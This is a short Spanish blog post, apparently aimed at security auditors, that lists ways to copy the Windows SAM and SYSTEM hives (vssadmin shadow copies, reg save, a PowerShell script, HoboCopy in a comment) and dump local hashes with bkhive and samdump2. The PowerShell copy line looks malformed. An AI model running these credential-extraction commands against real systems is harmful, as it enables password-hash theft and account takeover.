Extracción local de hashes de la SAM y SYSTEM en Windows

De sobra ya sabéis que la SAM y SYSTEM contienen la información necesaria para adquirir los hashes de autenticación de todos los usuarios locales en un sistema operativo Windows. Y seguro que también sabéis que estos archivos están bloqueados y son de difícil acceso, incluso para las cuentas de administrador del sistema.

Las siguientes técnicas que repasan en LaNMaSteR53 son formas de acceder a la SAM y SYSTEM de un SO Windows en funcionamiento. Ten en cuenta que estas técnicas requieren privilegios de administrador o del sistema.

 

Servicio Volume Shadow Copy

vssadmin create shadow /for=c: (if required)
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_above>\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_above>\windows\system32\config\SAM .
Referencia

Acceso al registro

reg save hklm\sam SAM
reg save hklm\system SYSTEM
Referencia
 

Script en PowerShell

$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
`cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM"\`
$volume.Delete();if($notrunning -eq 1){$service.Stop()}
Referencia
 

Finishing the Job

Los siguientes comandos se incluyen en la distro Kali:
bkhive SYSTEM keyfile
samdump2 SAM keyfile
 

Otros?

¡Comenta!

2 comentarios :

  1. Hola Vicente! yo para realizar los volcados en auditorías con el SO en funcionamiento, utilizo Hobocopy. Para copiar pagefile.sys, hiberfil.sys o los nombrados de SAM y system...

    HoboCopy.exe /full c:\windows\system32\config c:\copia\ SAM

    Saludos! :)

    ResponderEliminar
  2. Buenas Germán, no conocía esta herramienta, suena como a "HomoCopy" XD
    No en serio, realiza también un snapshot VSS antes de la copia... interesante..

    Muchas gracias!

    ResponderEliminar